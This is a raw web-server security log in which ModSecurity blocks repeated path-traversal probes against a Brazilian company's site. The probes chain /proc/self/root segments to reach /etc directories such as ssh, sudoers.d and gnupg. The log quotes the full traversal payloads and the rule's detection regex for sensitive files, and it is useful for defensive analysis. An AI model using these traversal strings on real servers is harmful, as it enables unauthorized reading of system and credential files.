[Mon Mar 16 14:33:25.862633 2026] [:error] [pid 21806:tid 140411658000128] [client 74.7.241.46:50584] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-5dSswJuvopo3lOhorgAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:33:27.084867 2026] [:error] [pid 21806:tid 140411616036608] [client 74.7.241.46:50588] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-59SswJuvopo3lOhorwAAAI8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:33:28.334821 2026] [:error] [pid 21806:tid 140411716749056] [client 74.7.241.46:52646] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-6NSswJuvopo3lOhosQAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:33:30.655365 2026] [:error] [pid 11972:tid 140411699963648] [client 74.7.241.46:52650] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-6pqj1wV0Si-Okef4PgAAAAU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:33:31.943349 2026] [:error] [pid 10772:tid 140411649607424] [client 74.7.241.46:52658] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-6_9ocpUE4ed4uDz5GAAAAgs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:33:34.594146 2026] [:error] [pid 15568:tid 140411716749056] [client 74.7.243.203:45896] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-7qQpVkWug9HeOt8_fwAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:33:39.114334 2026] [:error] [pid 10651:tid 140411624429312] [client 74.7.241.46:52674] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-87ysWC90G-1nBrBNzQAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:33:42.551370 2026] [:error] [pid 14895:tid 140411658000128] [client 74.7.241.46:50104] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-9lajLEzk2WiQ-10b-AAAAoo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:33:44.559527 2026] [:error] [pid 21533:tid 140411574073088] [client 74.7.243.203:60454] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg--HjZBu2q05ozVU9jzAAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:33:46.148394 2026] [:error] [pid 21806:tid 140411741927168] [client 74.7.243.203:49132] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg--tSswJuvopo3lOhosgAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:33:48.555453 2026] [:error] [pid 10651:tid 140411607643904] [client 74.7.243.203:49136] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-_LysWC90G-1nBrBNzwAAAZA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:34:15.256750 2026] [:error] [pid 15061:tid 140411674785536] [client 74.7.243.203:49152] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_F6TCbgAP5jq5Teg1UAAAAsg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:34:21.131236 2026] [:error] [pid 14895:tid 140411616036608] [client 74.7.243.203:34268] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_HVajLEzk2WiQ-10cIAAAAo8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:34:21.960755 2026] [:error] [pid 14895:tid 140411716749056] [client 74.7.241.46:50104] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_HVajLEzk2WiQ-10cIQAAAoM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:34:22.577285 2026] [:error] [pid 21806:tid 140411548894976] [client 74.7.243.203:48064] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_HtSswJuvopo3lOhovwAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:34:25.567258 2026] [:error] [pid 15061:tid 140411649607424] [client 74.7.244.31:34180] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abg_IaTCbgAP5jq5Teg1WQAAAss"]
[Mon Mar 16 14:34:26.150329 2026] [:error] [pid 11972:tid 140411733534464] [client 74.7.243.203:48070] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_Ipqj1wV0Si-Okef4SAAAAAE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:34:39.944796 2026] [:error] [pid 10772:tid 140411725141760] [client 74.7.243.203:48082] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_L_9ocpUE4ed4uDz5LwAAAgI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:35:13.857470 2026] [:error] [pid 10651:tid 140411540502272] [client 74.7.241.46:44750] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_UbysWC90G-1nBrBOAQAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:35:22.975763 2026] [:error] [pid 21806:tid 140411582465792] [client 74.7.241.46:51324] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_WtSswJuvopo3lOho0gAAAJM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:35:45.229950 2026] [:error] [pid 11972:tid 140411699963648] [client 74.7.241.46:39226] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_cZqj1wV0Si-Okef4bQAAAAU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:35:46.736389 2026] [:error] [pid 15568:tid 140411708356352] [client 74.7.243.203:36234] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_cqQpVkWug9HeOt8_xAAAA0Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
